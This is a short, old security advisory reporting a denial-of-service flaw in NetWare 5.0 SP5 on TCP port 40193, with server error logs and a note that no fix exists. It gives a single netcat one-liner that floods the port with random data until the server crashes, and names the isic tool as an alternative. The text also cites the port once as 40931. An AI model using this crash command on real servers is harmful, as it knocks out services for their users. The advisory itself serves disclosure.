COMMAND

    NetWare

SYSTEMS AFFECTED

    NetWare 5.0 with SP 5

PROBLEM

    Dimuthu  Parussalla  found  following.   He  encounter  a   buffer
    overflow  bug  in  NetWare  5.0  with  service  pack 5.  After few
    minutes after the attack server issue a memory allocation error.

        10-07-2000   12:29:53  pm:      SERVER-5.0-4631   [nmID=1001C]
        WARNING!  Server  XXXXX  experienced  a  critical  error.  The
        offending  process  was  suspended  or  recovered.    However,
        services hosted by this server may have been affected.

    Dimuthu continued  the attack  another 1/h  hr or  so. then server
    issued a Abend error and hangs.

        10-07-2000   12:29:53  pm:      SERVER-5.0-4631   [nmID=1001C]
        WARNING!  Server  XXXXX  experienced  a  critical  error.  The
        offending  process  was  suspended  or  recovered.    However,
        services hosted by this server may have been affected.

    How to perform attack?  Using a linux server connected to the same
    network.  Dimuthu did the following

        [root@tik /root]# cat /dev/urandom |nc 192.168.1.15 40193

    NetWare TCP port  40193 doesn't handle  frag TCP packets  as well.
    Using isic you will get the same results.

SOLUTION

    No fix yet,  but as Conrad  Wood noticed, 40931  is Netware/IP why
    should that run on NW5???  If you are using "compatibilty mode"  -
    that`s not a supported service and according to novell should  not
    be used in a production enviroment.